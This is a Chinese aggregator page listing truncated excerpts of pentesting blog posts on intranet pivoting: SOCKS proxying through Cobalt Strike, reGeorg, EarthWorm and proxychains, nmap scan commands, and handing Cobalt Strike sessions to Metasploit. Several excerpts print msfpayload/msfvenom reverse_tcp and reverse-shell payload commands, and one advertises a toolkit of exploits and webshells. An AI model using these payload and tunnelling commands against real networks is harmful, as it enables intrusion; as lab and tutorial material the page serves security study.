CS代理+proxychains+nmap进行内网扫描】的更多相关文章

前提:拿下边界机之后,进入内网,想用nmap怎么办? CS可以开启代理,但是是socks4的代理,只能使用tcp协议,所以nmap使用的时候要使用-sT选择使用tcp_协议,要使用-Pn不使用ICMP_的ping确认主机存活…
原文:SOCKS代理:从***到内网漫游 本文原创作者:tahf,本文属FreeBuf原创奖励计划,未经许可禁止转载 之前在Freebuf上学习过很多大牛写的关于Tunnel.SOCKS代理.***等文章,很受启发.作为一个小白,近期心血来潮,搜集并测试了一些Windows平台下的SOCKS代理工具,下面我想用自己简单搭建的一套模拟环境来展示SOCKS代理在内网漫游时的使用姿势并推荐几款Windows平台下实用的SOCKS代理工具.花了不少时间在制图上^0^. 0×00 引言 很久很久以前,突然…
我是如何通过一个 XSS 探测搜狐内网扫描内网并且蠕动前台到最后被发现的!(附带各种 POC) | WooYun-2014-76685 | WooYun.orghttp://wooyun.org/bugs/wooyun-2014-076685 传送门: 文章很精彩…
Holer简介 Holer是一个将局域网服务器代理到公网的内网映射工具,支持转发基于TCP协议的报文. 相关链接 开源地址:https://github.com/Wisdom-Projects/holer 软件包下载:https://github.com/Wisdom-Projects/holer/tree/master/Binary 如何使用Holer 1. 下载软件包holer-client.zip: 2. 使用前请先安装Java 1.7或者更高版本: 3. 解压holer-client.z…
#1.扫描内网存活主机 nmap -sP 10.2.24.* |grep for > tmp #2.扫描主机端口 nmap -A -T4 192.168.1.2 #3.扫描主机的所有端口 nmap -p 1-65535 192168.1.2 #4.扫描主机的操作系统 nmap -O 192.168.1.2 #5.扫描漏洞 nmap -script=smb-check-vulns.nse -v 192.168.1.2 #6.综合参数扫描目标主机 nmap -sS -sV -O -script=sm…
第一步 Cobalt strike 派生 shell 给 MSF(前提有个beacon shell) 第二步 选择要派生的beacon,右键-->增加会话,选择刚刚配置的foreign监听器 第三部 msf msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_t…
前端开发中:很多场景需要在局域网下的其他手机或设备查看网页, 问题来了, web服务部署在本机的某个端口上(8080),只能通过本机浏览器访问,  怎样能让局域网下的其他设备也访问呢?可能你会说 关闭防火墙/配置IIS/使用fiddler代理等等.虽然都可以, 但是却不满足我的需求. 需求:mac windows linux平台适用 最好简单,快捷, 一键配置等等 支持文件替换, 文件夹替换等等 Nproxy: 是一个npm包, 他能够代理你的网络服务到内网中, 只需要一个命令 nproxy c…
环境ubuntu虚拟机,以前linux配置ip都是从/etc/network/interfaces这里面更改,现在要在/etc/netplan下面配置. vim /etc/netplan/01-netcfg.yaml # This file describes the network interfaces available on your system # For more information, see netplan(5). network: version: 2 renderer: n…
0x00 前言 最近搞站的时候有内网穿透的需求,大佬向我推荐了EW,本文模拟一个攻击场景对Earthworm的使用方法做一个简单的介绍.其实相应的内容EW的官网已经说得很详细了,我这里纯粹是作为个人笔记从如下几个方面做一个简单的记录: 1.如何使用EW做反向Socks5代理 2.浏览器如何设置Socks5代理访问目标内网Web服务 3.利用proxychains给终端设置Socks5代理(方便将本地命令行工具的流量代理进目标内网) 0x01 基础环境及网络拓扑 Kali Linux(Attack…
工具: K8飞刀编译: 自己查壳组织: K8搞基大队[K8team]作者: K8拉登哥哥博客: http://qqhack8.blog.163.com发布: 2015/7/26 3:41:11 简介: K8飞刀是一款多功能的渗透测试工具. Hacker Swiss Army Knife. 内置大量漏洞EXP/GetShell/0day网马/U盘自动种马/脱库采集工具      支持7种WebShell管理/后台扫描/2级域名扫描/WordPress用户扫描      黑客浏览器/自动检测注入/自…
要解决的问题? 需要解决的问题:https://q.cnblogs.com/q/105319/ 简单来说就是本地机器通过一台公网机器SSH到公网机器后面的私网机器. 网络环境如下图:本地机器可访问代理机器,代理机器可访问内网机器,本地机器和内网机器不互通 操作步骤: 1.实现本地机器到代理机器的SSH连接. ssh ftpuser@proxyip 2.关键步骤:修改本地机器的ssh_config(/etc/ssh/ssh_config): Host proxy_5_10 HostName 代理机…
x01 reverse the shell File 通常做法是使用msfpayload生成一个backdoor.exe然后上传到目标机器执行.本地监听即可获得meterpreter shell. reverse_tcp/http/https => exe => victim => shell reverse_tcp windows: msfpayload windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPOR…
0x01 reverse the shell File 通常做法是使用msfpayload生成一个backdoor.exe然后上传到目标机器执行.本地监听即可获得meterpreter shell. reverse_tcp/http/https => exe => victim => shell reverse_tcp windows: msfpayload windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPO…
Vulnstack内网靶场3 (qiyuanxuetang.net) 环境配置 打开虚拟机镜像为挂起状态,第一时间进行快照,部分服务未做自启,重启后无法自动运行. 挂起状态,账号已默认登陆,centos为出网机,第一次运行,需重新获取桥接模式网卡ip. 除重新获取ip,不建议进行任何虚拟机操作. 添加一个网络,配置如下,该网络为内部网络 目标:域控中存在一份重要文件. 本次环境为黑盒测试,不提供虚拟机账号密码. kali 攻击机ip 192.168.1.64 外网主机信息收集 nmap -sV…
前言:无论内网还是外网渗透信息收集都是非常关键,信息收集越多越准确渗透的成功率就越高但成功率还受到漏洞影响,漏洞受时效性影响,对于大型内网扫描速度直接影响着成功率漏洞时效性1-2天,扫描内网或外网需1周时间,是否会因此错过很多或许可成功的漏洞?对于那些拥有几百上千域名的大站来说,你发现越快成功率就越高,慢管理员就打补丁了因此我们需要一个支持批量C段扫描的工具,支持自定义功能以便快速批量检测新出漏洞 Cscan简介:何为自定义扫描器?其实也是插件化,但Cscan不需要编程同样可实现自定义功能,这比…
Ladon LadonGUI Cobalt Strike PowerLadon PythonLadon LinuxLadon 使用说明 ID 主题 URL 1 Ladon文档主页 https://github.com/k8gege/Ladon/wiki 2 基础用法详解 https://github.com/k8gege/Ladon/wiki/Ladon-Usage 3 Cobalt Strike https://github.com/k8gege/Aggressor 4 Exp生成器使用 ht…
出品|MS08067实验室(www.ms08067.com) 本文作者:dch(Ms08067实验室 SRSP TEAM小组成员) 一.利用Metasploit进行攻击的流程图   Metasploit渗透流程 二.Metasploit渗透攻击 (1)通过msfconsole命令启动Metasploit在这个过程中,系统会主动加载数据库,如图2所示:   启动Metasploit (2)使用辅助模块进行端口扫描,如下图所示:   进行扫描 (3)寻找合适的漏洞利用模块并使用,如下图所示:   加…
当我们通过代理可以进入某内网,需要对内网主机的服务进行探测.我们就可以使用MSF里面的内网主机探测模块了. 在这之前,先修改 /etc/proxychains.conf ,加入我们的代理. 然后 proxychains msfconsole 启动MSF,这样,我们的MSF就可以探测内网主机了. 或者是在MSF里面添加0.0.0.0/24的路由,这样,只要被控主机可以到达的地址,我们也就可以探测! MSF的search支持type搜索: search scanner type:auxiliary…
from:https://www.91ri.org/9367.html Web渗透中的反弹Shell与端口转发 php需未禁用exec函数一:生成php反弹脚本msf > msfpayload php/reverse_php LHOST=x.x.x.x LPORT=2333 R > re.php 将文件传入shell中,在msf中开一个handlermsf > use multi/handlermsf exploit(handler) > set PAYLOAD php/rever…
1. Holer工具简介 Holer exposes local servers behind NATs and firewalls to the public internet over secure tunnels. Support forwarding message based on TCP protocol. Holer是一个免费开源的内网穿透工具,它可以将局域网服务器代理到公网的内网穿透工具,支持转发基于TCP协议的报文. Holer地址:https://github.com/Wis…
1. Holer工具简介 Holer exposes local servers behind NATs and firewalls to the public internet over secure tunnels. Support forwarding message based on TCP protocol. Holer是一个免费开源的内网穿透工具,它可以将局域网服务器代理到公网的内网穿透工具,支持转发基于TCP协议的报文. Holer地址:https://github.com/Wis…
0x00 问题描述 在渗透测试时,metasploit往往作为后渗透工具,(因为远程溢出越来越少).我一般都是在获得一个webshell后,来使用metasploit进行信息采集,或者内网扫描等操作.而大多数站点都是内网ip.而本屌丝自己的机器也是内网ip,那么两个内网ip怎么建立连接? 0x01 解决办法 以前总是使用lcx做端口转发连接站点的3389,是否也可以用lcx将metasploit和站点两个内网ip进行连接?发现是可行的.具体操作步骤如下: 网络环境: Metasploit:192…
一.场景如下: 各个角色的对应关系如下: 角色 描述 APP 个人笔记本,属于内网IP sshd server 公网 VPS ( 映射端口: port 2222 ),拥有公网IP ssh client 内网机器,属于另一个内网IP APPSRV 与 内网 ssh client 是同一台机器 ( 目的端口: hostport 22 ) 两个帐号:admin/password为“内网机器”ssh的登录帐号密码,VPS-user/password为“公网VPS”ssh的登录帐号密码 网络连通情况:“内…
公网连接内网数据库(如云数据库)时,通常需要白名单:如果不是白名单IP,通常需要一个跳板机(类似代理)来连接内网数据库, 下方以mysql为例(其他数据库基本一致): import pymysql as mysqlfrom sshtunnel import SSHTunnelForwarder server=SSHTunnelForwarder((SSH.IP,SSH.PORT), #跳板机ip及端口 ssh_username=SSH.USERNAME, #跳板机账号 ssh_password=…
Holer exposes local servers behind NATs and firewalls to the public internet over secure tunnels. Support forwarding message based on TCP protocol. Holer是一个免费开源的内网映射工具,它可以将局域网服务器代理到公网的内网映射工具,支持转发基于TCP协议的报文. Holer地址: https://github.com/Wisdom-Projects…
年初九 天公生 0x034 MSF(美少妇) 启动msf msfconsole 先启动msf依赖的postgresql数据库 初始化数据库 msfdb init (要用普通用户) msf路径 /usr/share 制作后门 msfvenom msfvenom -p payload脚本 lhost=监听/攻击机ip lport=端口 -f 文件类型 -o 文件名 linux示例 msfvenom -p linux/x64/meterpreter/reverse_tcp lhost 192.168.…
过程演示 测试前提是目标服务器已经getshell. 1.将 reGeorgSocksProxy 中的 tunnel.jsp 文件放置到目标服务器web目录,查看能否正常访问(如图). 2.设置kali的proxychains代理地址和端口(通过本地的socks5 2333端口出去) vi /etc/proxychains.conf 3.配置好后通过 reGeory 来打通本地和目标的通道(如图显示成功连接) 4.本地所有工具都可通过目标服务器进一步攻击(这样kali的所有工具就如同全部在内网那…
nmap扫描内网存活机器并保存在指定文件中. host.sh #/usr/bin/bash read -p "Please input scan host or network:" host nmap -sn $host | grep "Nmap scan report for" >/dev/null &>/dev/null [ $? -ne 0 ] && echo "host $host is down."…
Socks5+proxychains做正向代理 1.         应用场景: 有一台能上外网的机子,内网机子都不能连外网,需求是内网机子程序需要访问外网,做正向代理. 2.         软件 Server端:   Client端:       3.SOCKS5 是一个代理协议,它在使用TCP/IP协议通讯的前端机器和服务器机器之间扮演一个中介角色,使得内部网中的前端机器变得能够访问Internet网中的服务器,或者使通讯更加安全.SOCKS5 服务器通过将前端发来的请求转发给真正的目标服…
在内网渗透过程中,我们经常使用sockes代理工具,本文主要介绍攻击机为windows和linux情况下得使用方式. Win:proxifier+reGeorg 组合 Linux:proxychains+reGeorg组合 一.概述 本实验环境中,漏洞主机设置安全策略导致攻击主机无法直接进行远程连接,模拟实际测试环境中漏洞主机处于内网的场景.通过在跳板主机(web服务器)上部署reGeorg的tunnel.nosocket.php程序提供代理功能,攻击主机在proxifier 设置全局代理后可借…